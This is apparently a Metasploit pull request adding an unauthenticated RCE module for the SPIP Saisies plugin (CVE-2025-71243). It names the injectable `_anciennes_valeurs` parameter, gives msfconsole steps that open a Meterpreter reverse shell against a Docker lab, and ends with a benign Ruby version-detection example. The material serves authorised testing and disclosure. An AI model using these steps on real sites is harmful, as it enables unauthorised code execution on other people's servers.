Add SPIP Saisies plugin RCE module (CVE-2025-71243) #21001
Open
Chocapikk wants to merge 3 commits into rapid7:master from
Hello Metasploit Team,
This PR adds an exploit module for CVE-2025-71243, an unauthenticated PHP code injection in the SPIP Saisies plugin (versions 5.4.0 through 5.11.0).
Blog post with full technical details: https://github.com/Chocapikk/CVE-2025-71243
Module
`exploit/multi/http/spip_saisies_rce` (CVE-2025-71243)

Unauthenticated RCE via the `_anciennes_valeurs` form parameter. The saisies plugin interpolates raw user input into a hidden field rendered with `interdire_scripts=false`, allowing injected `<?php ?>` tags to be executed directly by PHP's template eval. Single POST request to any page containing a saisies-powered form.

Since saisies forms are custom (typically created with the Formidable plugin), the module supports two modes:

- `FORM_PAGE` to a known page name (e.g. `contact`)
- `FORM_PAGE` to `crawl` (default) to auto-discover a form by fetching the SPIP sitemap and following internal links

Mixin Enhancement

Added a `paquet.xml` fallback to `Msf::Exploit::Remote::HTTP::Spip#spip_plugin_version`. When the `Composed-By` header and `local/config.txt` are unavailable, the mixin now tries `plugins/<name>/paquet.xml` and `plugins/auto/<name>/paquet.xml` directly. This benefits all SPIP modules that use plugin version detection.

Targets

Verification

Docker Lab Setup

See the module documentation for full `docker-compose.yml` and `setup.sh`. SPIP will be available at http://127.0.0.1:8888 with the vulnerable saisies 5.11.0 plugin and a contact form.

Testing

- `msfconsole`
- `use exploit/multi/http/spip_saisies_rce`
- `set RHOSTS 127.0.0.1`
- `set RPORT 8888`
- `set PAYLOAD php/meterpreter/reverse_tcp`
- `set LHOST <your-ip>`
- `check` - Verify it returns Appears (saisies 5.11.0 detected via paquet.xml)
- `set FORM_PAGE contact` then `run` - Verify a Meterpreter session opens
- `set FORM_PAGE crawl` then `run` - Verify the crawler finds the form and a session opens

Documentation
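The `paquet.xml` fallback described in the Mixin Enhancement section is the part of this PR that a reader is most likely to want to see in isolation: probe the two plugin locations in order, pull the `version` attribute off the `<paquet>` root element, and compare it against the affected range. The Ruby below is an added stand-alone illustration of that logic, not the code from the PR or from the `Msf::Exploit::Remote::HTTP::Spip` mixin. The sample descriptor is constructed (modelled on the real paquet.xml layout, where `version` is an attribute of the root `<paquet>` element), the fetcher is a lambda standing in for an HTTP client, and `Gem::Version` is used for the range check in place of whatever the module itself uses; the candidate paths and the 5.4.0 to 5.11.0 range are taken from the PR description.

```ruby
require 'rexml/document'

# Constructed sample of a SPIP plugin descriptor, as it would be served from
# plugins/auto/saisies/paquet.xml; modelled on the real format, not fetched from any host.
SAMPLE_PAQUET_XML = <<~XML
  <?xml version="1.0" encoding="utf-8"?>
  <paquet prefix="saisies" categorie="outil" version="5.11.0" etat="stable"
          compatibilite="[4.0.0;4.4.*]">
    <nom>Saisies pour formulaires</nom>
  </paquet>
XML

# Affected range stated in the PR description (inclusive on both ends).
VULN_MIN = Gem::Version.new('5.4.0')
VULN_MAX = Gem::Version.new('5.11.0')

# The two locations the PR says the mixin falls back to, tried in this order.
def candidate_paths(prefix)
  ["plugins/#{prefix}/paquet.xml", "plugins/auto/#{prefix}/paquet.xml"]
end

# Return the version attribute of the <paquet> root element, or nil when the body is
# not a paquet descriptor, is malformed XML, or carries a version that is not dotted digits.
def paquet_version(xml)
  doc = REXML::Document.new(xml)
  root = doc.root
  return nil unless root && root.name == 'paquet'

  version = root.attributes['version']
  version if version && version.match?(/\A\d+(\.\d+)*\z/)
rescue REXML::ParseException
  nil
end

# Walk the candidate paths with a fetcher (lambda: path -> response body or nil on 404).
# Returns [path, version] for the first descriptor that parses, or nil if none does.
def detect_plugin_version(prefix, fetch)
  candidate_paths(prefix).each do |path|
    body = fetch.call(path)
    next unless body

    version = paquet_version(body)
    return [path, version] if version
  end
  nil
end

# Inclusive range check against the versions the PR lists as affected.
def vulnerable_saisies?(version)
  v = Gem::Version.new(version)
  v >= VULN_MIN && v <= VULN_MAX
end

# Constructed fetcher: this site keeps saisies under plugins/auto/, so the first
# candidate path returns nil (a 404 in real life) and the second one succeeds.
DEMO_FETCH = lambda do |path|
  path == 'plugins/auto/saisies/paquet.xml' ? SAMPLE_PAQUET_XML : nil
end

if __FILE__ == $PROGRAM_NAME
  path, version = detect_plugin_version('saisies', DEMO_FETCH)
  puts "saisies #{version} found at #{path}; in affected range: #{vulnerable_saisies?(version)}"
end
```

Keeping the root-element name check matters in practice: a SPIP install that answers every unknown path with a rendered 200 page would otherwise feed HTML into the version parser, and the regex on the attribute keeps a stray string from reaching `Gem::Version.new`, which raises on anything that is not a version.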